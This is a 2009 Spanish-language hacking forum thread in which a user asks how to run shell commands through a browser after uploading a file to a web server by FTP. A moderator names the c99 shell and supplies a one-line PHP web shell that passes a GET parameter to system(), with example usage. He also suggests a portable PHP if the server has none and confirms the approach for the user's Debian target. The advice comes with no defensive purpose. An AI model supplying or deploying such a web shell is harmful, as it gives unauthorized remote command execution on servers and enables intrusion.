elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  ataque con escripts de shell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ataque con escripts de shell  (Leído 4,413 veces)
aggagg69

Desconectado Desconectado

Mensajes: 24


Ver Perfil
ataque con escripts de shell
« en: 5 Diciembre 2009, 18:45 pm »

hola buenas tengo una duda quedria saver si suviendo un archivo atraves de un ftp a un servidor web

luego podria jecutar comandos atraves del mi navegador.
En línea

[u]nsigned


Desconectado Desconectado

Mensajes: 2.397

JS/Node developer


Ver Perfil WWW
Re: ataque con escripts de shell
« Respuesta #1 en: 5 Diciembre 2009, 18:59 pm »

Para que eso sea posible el server tendria que estar MUY MAL configurado..no se si te referis a script de bash o php o que?

Y de todas formas tus scripts (en caso de poder ejecutarse) correrian bajo tu user, el cual seguramente estara muy limitado.

Saludos
En línea

No hay atajo ante la duda, el misterio se hace aquí...
Se hace carne en cada uno, el misterio es existir!
aggagg69

Desconectado Desconectado

Mensajes: 24


Ver Perfil
Re: ataque con escripts de shell
« Respuesta #2 en: 5 Diciembre 2009, 19:07 pm »

supongamos que mi usuario tiene permisos suficientes.

scritp bash o php me es indiferente quisera saver si se puede y como ejecutar el script dado que solo

tendria acceso ftp por eso la ide del navegador para ejecutar comandos shell.
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: ataque con escripts de shell
« Respuesta #3 en: 5 Diciembre 2009, 21:52 pm »

Si lo quieres hacer desde el navegador entonces busca la shell c99, si el servidor es un windows con antivirus de seguro te lo va a detectar asi que le subes esto:
Código
  1. <?php @system($_GET['x']); ?>

Despues le ejecutas cosas como test.php?x=dir y ya.

Esto es posible siempre y cuando en ese servidor esté instalado un servidor web y php, en el caso de que tenga asp con ssi entonces necesitas una shell del tipo para asp.

Si no tiene servidor web entonces utiliza una versión portable de php y se lo dejas corriendo.
En línea

aggagg69

Desconectado Desconectado

Mensajes: 24


Ver Perfil
Re: ataque con escripts de shell
« Respuesta #4 en: 6 Diciembre 2009, 18:08 pm »

tiene servidor web y php es un sitema operativo debian 2.6

asi que entonces me servira la c99?
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: ataque con escripts de shell
« Respuesta #5 en: 6 Diciembre 2009, 20:24 pm »

si
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines